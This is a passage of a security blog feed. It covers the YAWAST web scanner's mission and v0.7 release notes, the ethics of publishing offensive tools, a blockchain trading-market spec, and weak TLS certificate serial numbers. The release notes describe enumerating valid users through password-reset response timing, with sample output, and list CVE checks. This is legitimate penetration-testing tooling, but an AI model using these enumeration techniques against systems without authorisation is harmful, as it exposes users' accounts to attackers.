Adam Caudill – Security Consultant, Researcher, & Software Developer

YAWAST: News & Mission (2020-01-05)



It’s been some time since I last wrote about YAWAST here – the last update was actually back in April, for the release of YAWAST v0.7.0. It’s currently at version 0.11.0, and a lot has changed. It’s been rewritten from scratch, more people have become involved, it has moved to a (fairly) regular release cycle, and it has expanded a fair bit in terms of functionality.

This is somewhat about the changes, but it’s more about the mission of YAWAST, and what I am working to achieve.

The Rewrite

When I last wrote about YAWAST here, it was written in Ruby; it’s now Python – rewritten (quite obviously) from the ground up, and made more stable, easier to extend, more flexible, and far more thorough. The reason for the rewrite was quite simple: a poll I posted to Twitter:

What we see here is that there is actually quite a difference in the likelihood that someone would contribute to YAWAST based on the language it’s written in. When I wrote the first lines of code for it back in 2013, Ruby was a favorite language among security-focused developers – most likely because the Metasploit Framework is written in Ruby. Fast forward 6 years, and Ruby received only 5.6% of the vote, while Python received a massive 55.6%.

For a tool like this to see long-term success, it’s important that it become more than a one-person show. With this in mind, I started the process of rebuilding YAWAST from scratch – this was a huge time investment, working a full-time job during the day, then working till 3AM most days on the rewrite. While that was a huge short-term cost, it was an investment in the future.

This rewrite provided an excellent opportunity to completely rethink the architecture of the tool – as it was becoming more complex, the older architecture was becoming a substantial limitation, making it difficult to achieve the level of coverage I desired. Now it’s easy to add new checks, and to add them far more efficiently than was possible in the past. The investment opened the door to making the tool far more useful, and far more effective.

The Mission

When performing a penetration test[1] against a web application, there are a huge number of things that a tester needs to look for – especially early on. The goal of YAWAST is to make the first hours of a penetration test as efficient as possible. There are a few ways that it works towards that:

  • It checks for as many issues as possible (that are suited to automation).
  • It provides detailed output to the console, as well as a machine-readable JSON file that can be used in conjunction with reporting tools to simplify the reporting process.
  • Once an issue is identified, the tester no longer needs to worry about it. This allows a tester to run YAWAST at the start of a test, and within a matter of minutes, they have eliminated a number of items from their to-do list.
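As an illustration of that reporting workflow, here is a minimal sketch of consuming a findings file and grouping the results for a report template. Note that the JSON structure below is invented for the example – it is not YAWAST’s actual schema:

```python
import json

# Hypothetical findings file -- the structure below is invented for this
# example and is not YAWAST's actual JSON schema.
report = json.loads("""
{
  "target": "https://example.com",
  "findings": [
    {"title": "Missing X-Frame-Options Header", "severity": "low"},
    {"title": "TLS 1.0 Enabled", "severity": "medium"}
  ]
}
""")

# Group findings by severity so a report template can consume them.
by_severity = {}
for finding in report["findings"]:
    by_severity.setdefault(finding["severity"], []).append(finding["title"])

for severity, titles in sorted(by_severity.items()):
    print(f"{severity}: {', '.join(titles)}")
```

Anything that gets findings out of the console and into a structured file like this is what makes the “eliminate it from the to-do list” workflow possible.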

By eliminating as many issues as possible at the start of an engagement, it’s possible to spend more time focused on what penetration testers do best: leveraging their extensive experience and knowledge to find issues that no scanner ever will. YAWAST isn’t meant to provide an assessment on its own – that’s simply not the goal; the goal is to allow more time and focus to be spent on manual testing (where the real value is).

I have devoted much of my career to making teams more effective, and that means identifying areas where productivity, focus, and energy are being lost, and taking advantage of technology to address those issues. I did this in development, and I do it today in application security. It’s no secret that a penetration tester’s time isn’t cheap, and it should be used as efficiently as possible to produce the best possible results.

The goal of YAWAST is, simply put, to make penetration testers more efficient.

  [1] When I use the term penetration test here, what I am actually referring to is a combined penetration test and vulnerability analysis. I am a firm believer that combining these two provides the most useful results, with the greatest long-term positive impact.

The post YAWAST: News & Mission appeared first on Adam Caudill.

Utilitarian Nightmare: Offensive Security Tools (2020-01-04)


Or: Ethical Decision Making for Security Researchers

There has been much discussion recently on the appropriateness of releasing offensive security tools to the world – while this storm has largely come and gone on Twitter, it’s something I still find myself thinking about. It boils down to a simple question: is it ethical to release tools that make it easy for attackers to leverage vulnerabilities that they wouldn’t otherwise be able to exploit?

I’ve written about the ethics of releasing this type of information before (On The Ethics of BadUSB, Responsible Disclosure Is Wrong), and I’ve always believed that it should be addressed on a case by case basis, based on what is best for end-users. What action protects them most effectively?

The problem with that, though, is that it’s a highly subjective standard; if you ask 10 security researchers where the line between helping and harming users is, you’re likely to get at least 10 answers. Perhaps, to drive this conversation forward, we need to look beyond our own gut feelings and personal positions to a more accepted framework for determining which releases are ethical, and which aren’t.

Enter Utilitarianism

utilitarianism is generally held to be the view that the morally right action is the action that produces the most good … bringing about the greatest amount of good for the greatest number – The History of Utilitarianism, Julia Driver

Jeremy Bentham by Henry William Pickersgill

While I personally find utilitarianism to be a most useful philosophy in general, it’s especially useful in questions such as this, where as a security researcher you are making a decision that can impact vast numbers of people. Relying on a well-studied model to determine if your decisions are sound is often a good idea – what seems right to you may be skewed by personal interest, bias, ego, or naivety.

While there’s no need to go into utilitarianism in great detail here, as it’s documented and discussed at length by others, it is useful to understand some of the basics, especially as they apply to security research and to the release of tools that may put people at risk. This is an incredibly complex topic, one that has been debated ad nauseam for many years and, in all honesty, one that will continue to be debated for many years to come. Hopefully though, a brief discussion of the ethics of this issue from a philosophical perspective will help you in your future decisions.

There are a few things about utilitarianism that are of particular importance for this discussion:

  • Positive impact is impartially considered. What is good for you is no more important than what is good for any other person. This is a critical aspect to understand, and one that mustn’t be ignored. If you place your own interests above those of others, you are discounting the impact of the decision on others – quite likely resulting in a choice that has an outsized negative impact without your realizing it.
  • Happiness is the only thing that has intrinsic value. Security provides happiness in that it makes people feel safe, and reduces the risk of being unhappy should they suffer an attack in the future. In this philosophical view, technical security has no intrinsic value whatsoever. This is sometimes difficult to process for those that have built their career around security – we work very hard to make the world a safer place through technical skills and extensive knowledge, but it’s the result that effort has on people (making them happy) that has value.
  • It’s the consequences that matter. Utilitarianism is a consequentialist philosophy; all that matters is the impact of a decision. Your motives for releasing something to the world are actually irrelevant – it doesn’t matter if your underlying motivation was to make people safer or to sink the stock of a company; what matters is how much happiness you added to the world versus the amount of unhappiness. Having good intentions doesn’t make a decision ethical if the impact is negative.

With these three key points, we can begin to break down the decision-making process and try to identify whether a decision is ethical or not.

Utility Calculus

The father of modern utilitarianism, Jeremy Bentham, helpfully developed a formula to determine if an action is ethical; here is a somewhat simplified version of that formula:

  • Intensity – How strong is the feeling of happiness?
  • Duration – How long does the happiness last?
  • Certainty – How likely is the happiness to actually occur?
  • Immediacy – How soon will the happiness occur?
  • Productivity – How likely is this happiness to lead to further happiness?
  • Purity – How likely is it that this happiness will not be followed by unhappiness?
  • Extent – How many people will this make happy?
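Purely as a thought experiment, the factors above can be sketched as a crude scoring exercise. The weights below are entirely invented for illustration – this is not a real methodology, just a way to make the formula concrete:

```python
# Toy utility calculus: score each of Bentham's factors from -1.0 (strongly
# negative) to 1.0 (strongly positive). The numbers here are illustrative
# placeholders, not a real assessment of any decision.
factors = {
    "intensity": 0.6,     # how strong the resulting happiness is
    "duration": 0.4,      # how long it lasts
    "certainty": 0.7,     # how likely it is to occur at all
    "immediacy": 0.5,     # how soon it occurs
    "productivity": 0.3,  # chance it leads to further happiness
    "purity": -0.2,       # risk it is followed by unhappiness
    "extent": 0.8,        # how many people it reaches
}

# A positive sum suggests the action adds more happiness than it removes.
net_utility = sum(factors.values())
print(f"net utility: {net_utility:.1f}")
```

The point isn’t the arithmetic; it’s that forcing yourself to assign each factor a value, however rough, exposes which parts of your reasoning are actually guesses.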

For some things, it’s easy to determine if a decision is ethical – for example, donating money to a food bank. On one hand, you are losing money that could have been used to make yourself happy. On the other hand, it will likely make several other people far happier than you would have been, it will have a quick impact, it may lead to avoiding illness thanks to a better diet, it’s unlikely to lead to future negative effects, and there is little doubt that it will actually have that positive impact. In this case, there’s no real doubt that it is, in fact, an ethical choice to make.

Not everything is this simple though. A couple years ago I wrote about breaking encryption used by ransomware, complete with the full details of the mistakes that the author made. This is a more complex situation, and some were very vocal in stating that they thought it wasn’t ethical to disclose all of the details. In this case, I was informing defenders of an approach that could lead to recovering data that had been encrypted by this malware, informing developers on how to build more secure applications by learning lessons from a public failure, and inspiring those that have to deal with ransomware to look into an approach that they could consider in future cases. I was also making it easy for the developers of the ransomware to fix their mistakes by explaining exactly what they did wrong. My belief when I wrote that article was that it would be a net positive, even in the unlikely case that the developer of the ransomware found my article and corrected their mistakes. Was it actually ethical? I’m still not sure.

The Nightmare

As with my example about the ransomware above, offensive security tools are not nearly so easy to analyze. There are many factors that need to be considered, and then, and only then, can a determination be made as to the true impact.

  • Would an attacker of average skill be able to discover how to exploit a vulnerability if the tool wasn’t released?
  • Is there a patch available to address the issue?
    • If yes:
      • Have users had a reasonable amount of time to install it?
      • Will releasing the tool now lead to more systems being patched?
    • If no:
      • Will making a tool available lead to a patch being available sooner?
      • Is there a work-around available to allow users to protect themselves?
  • If there is no tool available, will users be able to reasonably determine if they are impacted?
    • Will users be able to detect the issue in an automated fashion if no tool is released?
  • Is there a way to protect users from attackers, without giving attackers full information on how to exploit an issue?
    • Will withholding a tool lead to a false sense of security or delay patching?
  • What is the likelihood that attackers will leverage the tool against users?
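To make the weighing concrete, the checklist above can be sketched as code. The questions mirror the list, but the scoring is a deliberately crude stand-in for the judgment a researcher actually has to apply – the weights are invented for illustration only:

```python
# A sketch of the release checklist as a scoring function. The question
# names and weights are invented for illustration; real decisions need
# real judgment, not a formula.
def release_recommendation(answers: dict) -> str:
    score = 0
    if answers["attacker_of_average_skill_could_exploit_anyway"]:
        score += 1  # withholding the tool protects few users
    if answers["patch_available"] and answers["users_had_time_to_patch"]:
        score += 1  # the exposure window has largely closed
    if answers["release_likely_speeds_patching"]:
        score += 1  # pressure to patch is a defensive benefit
    if answers["attackers_likely_to_weaponize"]:
        score -= 2  # direct, probable harm to users
    return "release" if score > 0 else "withhold (for now)"

# Example: a patched issue that average attackers couldn't exploit on
# their own, where release drives patching but weaponization is likely.
print(release_recommendation({
    "attacker_of_average_skill_could_exploit_anyway": False,
    "patch_available": True,
    "users_had_time_to_patch": True,
    "release_likely_speeds_patching": True,
    "attackers_likely_to_weaponize": True,
}))
```

Even a toy model like this makes one thing obvious: change a single answer and the recommendation can flip, which is exactly why these decisions have to be revisited as information changes.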

There are many more questions that could be asked, of course, but these are some of the basics that should be considered when determining what goes public (and when). As a researcher, determining what is released to the public is a significant decision, and one that places a great deal of responsibility on the researcher to determine the best approach for a given situation. There is no single rule that will ever be right for every situation; many factors must be weighed and reweighed as information changes, and it is this process of asking questions that will allow researchers to make the best decision possible – the best decision for the greatest number of people.

I have often described security research as being in a perpetual gray area, where the lines of right and wrong, ethical and unethical are unusually blurry. Some things are clear and without question, but many things exist in a more complex state. As a researcher it’s important to find a way to break down your own decision making to ensure that what you are doing is actually in the best interest of users.



While this presents what I consider to be the best philosophy for evaluating the ethics of a decision as a researcher, it is not the only method, and may not be the best for you. It’s unlikely that any single philosophy will ever be accepted by everyone; what is important is that everyone who takes on weighty decisions that can have a substantial impact on other people evaluates how they come to those decisions, and finds an approach that ensures they are truly ethical.

The post Utilitarian Nightmare: Offensive Security Tools appeared first on Adam Caudill.

Insane Ideas: Blockchain-Based Automated Investment System (2019-09-10)


This is part of the Insane Ideas series. A group of blog posts that detail ideas, possible projects, or concepts that may be of interest. These are ideas that I don’t plan to pursue, and are thus available to any and all that would like to do something with them. I hope you find some inspiration – or at least some amusement in this.

A few months ago I was reading about high-frequency trading (HFT) – algorithms that allow investors to make money essentially out of nothing by executing trades at high speed, and leveraging the natural (and artificial) volatility of the market. While contemplating how HFT could be applied to a blockchain environment, I had an idea that I considered to be equal parts brilliant and insane (as described to a friend of mine):

A blockchain/smart contract based market; functioning similar to a stock market, but instead of holding shares in a company, you hold shares of a contract. Contracts will automatically trade in shares of other contracts to generate profit; contracts that perform well will have more demand, and thus be worth more.

Rules limit the maximum time a contract can hold shares and a requirement that a contract hold at least N% of its value in shares of other contracts will ensure constant trading activity. Each contract is essentially a HFT system trading against all the other contracts.

With the ability to trade options on other contracts, it would produce a very dynamic market that exists for the sole purpose of making money.

This is a market that is intended to be volatile, constantly changing, with new smart contracts being created and closed frequently. There would be immense pressure to create ever more sophisticated contracts that can outperform the competition. This rapid evolution would allow those that choose well to make a substantial profit. Of course, those that pick their investments poorly will find losses mounting up very quickly.

This is, simply put, crazy. It’s a very high risk / high reward system that is designed for investors that are willing to take substantial risks – though the upside could also be substantial.

This project became something of a thought experiment, and what follows is the start of a high-level specification for this system. This isn’t complete, though it could have some value to someone – it has no value sitting unseen in my notes.

Please note: The following contains opinions on legal matters. I am not an attorney, nor is this legal advice. Please consult with an attorney should you decide to pursue a concept like this, as it’s highly likely that they will have many opinions that you should listen to.


Overview

This document describes a novel blockchain-based investment system, designed to provide a fair market using smart contracts that engage in automated trading. These smart contracts issue shares, allowing investors to profit from their performance.

The network uses a hybrid centralized-decentralized approach to ensure the level of performance needed to achieve the stated goals and to support rapid trading activity. A truly decentralized approach is likely not possible for a variety of reasons, though pursuing such a design would present some novel problems that are worthy of future research.


Definitions

This document uses the following definitions throughout.

Coin – This is the “currency” of the system, used to purchase shares from contracts, and used by contracts to purchase shares of other contracts. Coin is issued by a special contract, and is a Network Token, no different than the tokens that represent shares of a contract.

Network Token – This is a token that represents value in the network, it may represent Coin, or shares of a contract. Each token includes the identification of the contract that it originates from.

Potential Legal / Tax Issues

Securities – It’s possible that the contract shares could be seen by the SEC as a security. This would need to be reviewed by an expert in this area of law to determine what compliance steps would be needed.

Capital Gains – The tax implications of this type of trading aren’t clear. This will need to be reviewed to determine the tax implications of this design and how best to handle these issues.

Block Generator

The Block Generator is a system elected from among the Block Signers that is responsible for collecting Commitments from the network and producing a new block every blockGenerationTime seconds. The Commitments will be added to a block and signed by the Block Generator; it will then send the new block to each of the Block Signers for their signatures. Each Block Signer will return its signature of the block. The Block Generator will then broadcast the new block to the network.

The Block Generator will only publish blocks that have at least blockMinimumSigners signatures, excluding its own. The Block Generator SHOULD publish a block as soon as it has received enough signatures to satisfy the blockMinimumSigners requirement.

Given the importance of quickly producing blocks to the system, the Block Generator should be a highly redundant system, resilient to common disruptions.

Block Generation Reward

Given the critical role that the Block Generator and the other Block Signers play, a reward is issued on the creation of each block. When a new block is created, the Coin Contract will mint new Coin, and distribute it evenly among those that signed the block, including the Block Generator.

No reward is generated for special purpose blocks.
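The even split described above can be sketched as follows; the reward amount and participant names are invented for illustration, and the spec does not say how a non-divisible remainder is handled (this sketch assumes it is simply burned):

```python
# Sketch of the block generation reward: the Coin Contract mints
# blockProductionReward new Coin and splits it evenly among everyone who
# signed the block, including the Block Generator. Values are illustrative.
def distribute_reward(reward: int, signers: list, generator: str) -> dict:
    recipients = signers + [generator]
    # Assumption: any remainder from uneven division is burned, since the
    # spec only requires an even distribution.
    share = reward // len(recipients)
    return {who: share for who in recipients}

payouts = distribute_reward(100, ["signer-a", "signer-b", "signer-c"], "generator")
print(payouts)
```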

Operating Fees

To ensure the continued health of the network, there are certain operating fees that are charged to each contract on a weekly basis. These fees are a percentage of the total value of the contract, and are defined in the Network Parameters. These fees are:

Network Operator Fee – To cover the cost of operating and scaling the underlying network.

Coin Contract Operator Fee – To cover the administrative, security, and other costs of maintaining the contract configuration and protecting the assets held by the contract.

Founders Fee – This fee is paid to the founders of the network, to enable them to recover development costs, and continue to invest in improving the network.

These fees are payable via Coin or shares of the contract they are charged against. All contracts, other than the Coin Contract and Closed contracts must pay these fees. If multiple addresses are listed for any fee, the payment MUST be split evenly between these addresses.
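A sketch of the weekly fee calculation, including the required even split when a fee lists multiple addresses; the fee rates and addresses shown are placeholders, not values from the spec:

```python
# Weekly operating fees: each fee is a percentage of the contract's total
# value, and a fee with multiple payout addresses MUST be split evenly
# between them. The rates and addresses below are invented for illustration.
def weekly_fees(contract_value: float, fee_rates: dict, fee_addresses: dict) -> dict:
    payouts = {}
    for fee_name, rate in fee_rates.items():
        total = contract_value * rate
        addresses = fee_addresses[fee_name]
        for addr in addresses:
            payouts[addr] = payouts.get(addr, 0.0) + total / len(addresses)
    return payouts

payouts = weekly_fees(
    contract_value=1_000_000.0,
    fee_rates={"networkOperator": 0.001, "coinContractOperator": 0.0005, "founders": 0.0005},
    fee_addresses={
        "networkOperator": ["addr-net-1"],
        "coinContractOperator": ["addr-coin-1"],
        "founders": ["addr-founder-1", "addr-founder-2"],  # split evenly
    },
)
print(payouts)
```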

Network Parameters

Multiple items in the investment contracts and other network components refer to agreed upon configuration items. These items will be retrieved from the most recent Network Parameters special block. This block will contain a single record containing a JSON document which defines all parameters needed for the network to function.

These values include:

  1. blockGenerationTime (in seconds)
  2. blockGenerator (public key & address, 1 item)
  3. blockSigners (public key & address, multiple items)
  4. blockMinimumSigners (int, must be less than blockSigners)
  5. blockProductionReward (int)
  6. contractMinimumSharePrice (int, in Coin)
  7. contractMaximumShareHoldTime (in seconds)
  8. contractMinimumShareHoldTime (in seconds)
  9. contractMaximumManagerFee (percentage of contract value, decimal)
  10. contractMaximumManagerShare (percentage of contract share, decimal)
  11. contractNetworkOperatorFee (percentage of contract value, decimal)
  12. contractNetworkOperatorFeeAddress (address list)
  13. contractFoundersFee (percentage of contract value, decimal)
  14. contractFoundersFeeAddress (address list)
  15. contractCoinContractOperatorFee (percentage of contract value, decimal)
  16. contractCoinContractOperatorFeeAddress (address list)
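A Network Parameters record might look something like the following. The keys follow the list above; every value (and the "..." strings) is a placeholder shown only to make the structure concrete:

```python
import json

# Hypothetical Network Parameters document; keys follow the spec's list,
# values are placeholders only.
params = json.loads("""
{
  "blockGenerationTime": 5,
  "blockGenerator": {"publicKey": "...", "address": "..."},
  "blockSigners": [
    {"publicKey": "...", "address": "..."},
    {"publicKey": "...", "address": "..."},
    {"publicKey": "...", "address": "..."}
  ],
  "blockMinimumSigners": 2,
  "blockProductionReward": 100,
  "contractMinimumSharePrice": 1,
  "contractMaximumShareHoldTime": 86400,
  "contractMinimumShareHoldTime": 60,
  "contractMaximumManagerFee": 0.02,
  "contractMaximumManagerShare": 0.10,
  "contractNetworkOperatorFee": 0.001,
  "contractNetworkOperatorFeeAddress": ["..."],
  "contractFoundersFee": 0.0005,
  "contractFoundersFeeAddress": ["..."],
  "contractCoinContractOperatorFee": 0.0005,
  "contractCoinContractOperatorFeeAddress": ["..."]
}
""")

# The spec requires blockMinimumSigners to be less than the signer count.
assert params["blockMinimumSigners"] < len(params["blockSigners"])
print(f"{len(params['blockSigners'])} signers, minimum {params['blockMinimumSigners']}")
```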

A new Network Parameters block may be generated by any Block Signer, and must be signed by blockMinimumSigners, excluding the Block Signer that generated the block. Should the Block Generator become unavailable, the Block Signers MUST elect a new Block Generator, and produce a new Network Parameters block.


Contracts

All contracts are immutable, and may not be changed, amended, or otherwise altered once they are created. While not allowing updates does complicate the situation should a vulnerability be discovered, it is the only way to ensure that a contract cannot be updated in a way that would enable fraudulent activity once it has established value.

All contract code will be included in the special purpose block that creates the contract, making the source code public. Portions of the code, including the code that processes the New Block Action, may be encrypted using a key available to the Contract Execution Servers, provided that the Contract Manager provides a code review report from an approved security vendor to the public, and requests approval from operators of all Block Signers. The Block Signer operators may approve or reject the request at their discretion. Partially encrypted contracts are allowed to protect sensitive strategy information that may be critical to contract performance.

When a contract is created, it defines a certain number of shares, which it will initially own all of. It is not possible for a contract to issue additional shares, or to perform stock splits, or reverse splits. The number of existing shares is immutable.

Contracts have four states that they may exist in:

Active – Contract is live, and may engage in normal activity.

Restricted – A contract may be placed in a Restricted state, meaning that no activity is permitted. The New Block Action will not be executed, and the contract will not be permitted to sell shares of itself, buy shares, or otherwise engage in normal trading. A contract may be Restricted, or have its state changed back to Active, by a special purpose block. The purpose of this state is to minimize risk should a vulnerability be discovered. In the Restricted state, the Contract Manager may opt to close the contract by changing its state to Closing.

Closing – When a contract state is changed to Closing, the contract will begin a shutdown process, liquidating its assets and halting its normal trading activity. Once a contract has been placed in Closing, it can not be changed back to Active. When the contract has liquidated all assets, holding only Coin and its own shares, it will move to the Closed status.

Closed – When a contract enters the Closed state, which is only possible by going through the Closing state, the contract will issue a Repurchase transaction for all outstanding shares, and cease all activity. The contract distributes all Coin it holds via the Repurchase; when completed, it will hold only shares of itself.

Closing A Contract

At the end of the life of a contract, the holder of the contract’s private key SHALL trigger the contract to close. When a contract is closed, the following actions are taken:

  1. The contract stops all direct sales of its own shares, if any are remaining.
  2. The contract stops all purchases of shares using its own shares as the currency (Share Swapping).
  3. The contract stops all purchases using Coin as the currency.
  4. The contract sells shares in other contracts only for Coin.
  5. When all assets have been sold, the contract will issue a Repurchase transaction for all outstanding shares, calculating the price based on total Coin held divided by the number of outstanding shares.
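Step 5 is simple arithmetic: the Repurchase price is the Coin the contract holds divided by the shares still outstanding. The numbers below are illustrative:

```python
# Repurchase price at contract close: total Coin held divided by the
# number of outstanding shares. Example values are illustrative.
def repurchase_price(total_coin_held: float, outstanding_shares: float) -> float:
    return total_coin_held / outstanding_shares

# A closing contract holding 50,000 Coin with 8,000 shares outstanding:
price = repurchase_price(50_000.0, 8_000.0)
print(f"{price} Coin per share")
```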

Contract Execution

All contracts will be executed via Contract Execution Servers that are operated by the Network Operator.

Purchasing Contract Shares

Contract shares may be purchased via an exchange, or from the contract directly. Shares purchased from the contract have a minimum price of contractMinimumSharePrice per full share; this is to ensure that new contracts are able to gain adequate funding to operate.

Shares of a contract may be purchased either as full shares (1.0 share), or as a fractional share.

The Coin Contract

The Coin Contract is a special purpose contract that backs all Coin issued within the system. It acts as the value store backing Coin, receiving payments in cryptocurrencies, and returning new Coin in exchange. The Coin Contract will also repurchase Coin, transferring cryptocurrency for Coin received; Coin received via this system will be burned and removed from circulation.

The Coin Contract acts much like a regular contract from a functional perspective, except that it is the only contract that is able to produce new tokens beyond those created when the contract was created.

Coin is created via two mechanisms:

  1. Direct Purchase – When Coin is purchased from the Coin Contract via another currency, new Coin is produced.
  2. Block Generation Reward – When a new block is generated, new Coin is produced as a reward and to cover operations expense for the system operators.

The Coin Contract operator SHALL choose which cryptocurrencies are accepted, and which, if any, are thereafter converted to another cryptocurrency. The Coin Contract may not hold any reserves in Coin, or any other tokens from this network; all value must be stored in an outside value store.

The Coin Contract will use multiple sources of data, whenever possible, to determine the appropriate exchange rates.

Coin Contract Operator

As the Coin Contract holds value outside of the system, it must have an operator that is responsible for the security of its holdings, and updating its configuration. This operator should be a distinct legal entity, with oversight that is independent from the rest of the system.

The Coin Contract Operator SHOULD publish regular reports listing the status of the accounts held for the Coin Contract, and engage with a reputable auditor to provide assurance that the funds are secured.

The Coin Contract Operator SHOULD place funds in excess of what is needed for the Coin Contract to operate for 30 days with a fully independent custodian, such as a regulated financial institution.

Funds held for the Coin Contract MUST NOT be used for operating or other expenses by any party.

Contract Manager

The Contract Manager is the party that holds the private key for a contract, allowing them to update the contract’s configuration and change the state to Closing.

The Contract Manager MAY charge a fee against the contract, based on a percentage of total value, up to contractMaximumManagerFee. Any fee specified by the contract that exceeds contractMaximumManagerFee will be reduced to contractMaximumManagerFee.

Upon creation of a contract, the Contract Manager MAY receive shares automatically from the contract, based on a percentage of total shares, not to exceed contractMaximumManagerShare. The Contract Manager may purchase additional shares through the normal mechanism and at market rates.
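The fee rule above is a clamp, not a rejection: a fee that exceeds contractMaximumManagerFee is reduced to the maximum. A minimal sketch, with placeholder rates:

```python
# The manager fee is clamped to contractMaximumManagerFee: any larger
# value specified by the contract is reduced, not rejected. Rates shown
# are placeholders.
def effective_manager_fee(requested_fee: float, contract_maximum_manager_fee: float) -> float:
    return min(requested_fee, contract_maximum_manager_fee)

print(effective_manager_fee(0.05, 0.02))  # over the cap: reduced
print(effective_manager_fee(0.01, 0.02))  # under the cap: unchanged
```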

Network Operator

The Network Operator is responsible for operating the components of the system that cannot be decentralized while maintaining the level of performance required.

The Network Operator SHALL operate a number of Contract Execution Servers sufficient to process all contracts with minimal delay after a new block is broadcast.

The Network Operator SHALL operate a public exchange, with minimal fees, supported by the Network Operator Fee, to allow users to easily buy, sell, and trade Coin and contract shares.

The Network Operator SHALL employ reasonable security measures for all systems they operate for the network.

If the Network Operator also operates Block Signers, the number of Block Signers they operate MUST be less than 50% of blockMinimumSigners to minimize the risk that the Network Operator is able to perform fraudulent activity.

The post Insane Ideas: Blockchain-Based Automated Investment System appeared first on Adam Caudill.

YAWAST v0.7 Released (2019-04-19)

The post YAWAST v0.7 Released appeared first on Adam Caudill.

It has now been over a year since the last major release of YAWAST, but today I am happy to release version 0.7, which is one of the largest changes to date. This is the result of substantial effort to ensure that YAWAST continues to be useful in the future, and add as much value as possible to those performing security testing of web applications.

If you are using the Gem version, simply run gem update yawast to get the latest version.

JSON Output

One of the headline features is that YAWAST now supports producing JSON output via the new --output=<file> parameter. This will create a JSON file that can be used to record the actions of YAWAST in more detail, and be used in reporting automation. The goal of this feature is to capture all of the information that is needed to produce a report automatically.

If you specify --output=. or --output=/path/., YAWAST will automatically generate a file name based on the domain name and current time.

The overall structure of the JSON output shouldn’t change, but the details included may change over time as the output is refined to make it as useful as possible.

Enhanced Vulnerability Scanner

The other major change in this version is the new vulnerability scanner, which adds a number of new checks and opens the door to more easily adding checks in the future. This is currently accessed via the --vuln_scan parameter, as it is seen as a beta-level feature; when used without that parameter, YAWAST behaves as it has in the past. In the future, this will become the default behavior, once it's clear that it is stable.

It is recommended that you use --vuln_scan unless it is causing issues for you (and if it does cause issues, please open an issue).

One behavioral change is that the new --spider option works differently in each mode; --vuln_scan will always spider the site, so in that mode, --spider simply adds printed output to the UI listing the URLs found.

This new scanner leverages Chrome via an automated interface to perform certain tasks that can only be properly tested through browser interaction; this adds some new dependencies, though the application should fail gracefully if they aren't present.

The YAWAST Docker image has been updated to work with this new feature, making it the easiest way to use it.

User Enumeration via Password Reset Form (Timing & Response)

One new experimental feature that I would like to point out is that YAWAST will attempt to use the target application’s Password Reset Form (specified via --pass_reset_page) using Chrome automation to capture the difference between a valid user (specified via --user) and a randomly generated invalid user. It will compare the responses and display a diff of the changes between the two.

YAWAST will attempt to automatically identify the form field that captures the username / email address; if it fails to find the field, it will prompt you to provide its name or id.

It will run this procedure a total of 5 times, capturing the timing of each request, to determine if timing information can be used to identify valid users.

[V] Password Reset: Possible User Enumeration - Response Timing (see below for details)
    Difference in average: 368.6ms  Valid user: 736.15ms  Invalid user: 367.55ms
    Valid Users     Invalid Users
         990.15            598.39
         727.22            312.19
         679.86            303.05
         796.91            319.85
         486.62            304.27
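The comparison shown above can be sketched in a few lines. This is a hypothetical illustration of the idea, not YAWAST's actual code; the sample timings are the ones from the output above.

```python
# Hypothetical sketch of the response-timing comparison (not YAWAST's code);
# the sample timings are the ones shown in the output above.
import statistics

valid_ms = [990.15, 727.22, 679.86, 796.91, 486.62]    # known-valid user
invalid_ms = [598.39, 312.19, 303.05, 319.85, 304.27]  # random invalid user

avg_valid = statistics.mean(valid_ms)
avg_invalid = statistics.mean(invalid_ms)

# A large, consistent gap suggests the application does extra work (such as
# sending a reset email) only for valid users -- enabling user enumeration.
print(f"Difference in average: {avg_valid - avg_invalid:.1f}ms")  # 368.6ms
```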

Change Log

Here is a list of the changes included in this version:

  • #38 – JSON Output Option via --output= (work in progress)
  • #133 – Include a Timestamp In Output
  • #134 – Add options to DNS command
  • #135 – Incomplete Certificate Chain Warning
  • #137 – Warn on TLS 1.0
  • #138 – Warn on Symantec Roots
  • #139 – Add Spider Option
  • #140 – Save output on cancel
  • #141 – Flag --internalssl as Deprecated
  • #147 – User Enumeration via Password Reset Form
  • #148 – Added --vuln_scan option to enable new vulnerability scanner
  • #151 – User Enumeration via Password Reset Form Timing Differences
  • #152 – Add check for 64bit TLS Cert Serial Numbers
  • #156 – Check for Rails CVE-2019-5418
  • #157 – Add check for Nginx Status Page
  • #158 – Add check for Tomcat RCE CVE-2019-0232
  • #161 – Add WordPress WP-JSON User Enumeration
  • #130 – Bug: HSTS Error leads to printing HTML
  • #132 – Bug: Typo in SSL Output
  • #142 – Bug: Error In Collecting DNS Information


Adam Caudill <![CDATA[TLS: 64bit-ish Serial Numbers & Mass Revocation]]> 2019-03-12T21:34:45Z 2019-03-10T00:02:40Z During a recent discussion about the DarkMatter CA on a Mozilla mailing list, it was found that their 64-bit serial numbers weren’t actually 64 bits, and it opened a can of worms. It turns out that the serial number was effectively 63 bits, which is a violation of the CA/B Forum Baseline Requirements that state… Continue reading TLS: 64bit-ish Serial Numbers & Mass Revocation

The post TLS: 64bit-ish Serial Numbers & Mass Revocation appeared first on Adam Caudill.

During a recent discussion about the DarkMatter CA on a Mozilla mailing list, it was found that their 64-bit serial numbers weren’t actually 64 bits, and it opened a can of worms. It turns out that the serial number was effectively 63 bits, which is a violation of the CA/B Forum Baseline Requirements that state it must contain 64 bits of output from a secure random number generator (CSPRNG). As a result of this finding, 2,000,000 certificates or more may need to be replaced by Google, Apple, GoDaddy and various others.

Update: GoDaddy initially said that more than 1.8 million of their certificates were impacted; they drastically reduced this number in an update posted on 2019-03-12. The full number of certificates impacted by this is still being discussed.

It’s quite likely that the full scope of this problem hasn’t been determined yet.

The Problem

During an analysis of certificates issued by DarkMatter, it was found that they all had a length of exactly 64 bits – not more, not less. If there’s a rule that requires 64 bits of CSPRNG output, and the serial number is always 64 bits, at first glance this seems fine. But, there’s a problem, and it’s in RFC 5280; it specifies the following:

The serial number MUST be a positive integer assigned by the CA to each certificate. It MUST be unique for each certificate issued by a given CA (i.e., the issuer name and serial number identify a unique certificate). CAs MUST force the serialNumber to be a non-negative integer.

Requiring a positive integer means that the high bit can’t be set – if it is set, it can’t be used directly as a certificate serial number. As such, if the high bit is set, there are two1 possible options:

  1. Pad the serial with an additional byte, so that the full 64 bits of output is used.
  2. Discard the value, and try again until you get a value without the high bit set. This means that the size is always 64 bits, and the high bit is always 0 – giving you 63 effective bits of output.
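The two options above can be sketched as follows; this is illustrative Python, not any CA's actual code.

```python
# Illustrative sketch of the two options above (not any CA's actual code).
import secrets

def serial_pad() -> int:
    # Option 1: keep all 64 random bits; when the high bit is set, the DER
    # encoding simply gains a leading zero byte to keep the integer positive.
    return secrets.randbits(64)

def serial_retry() -> int:
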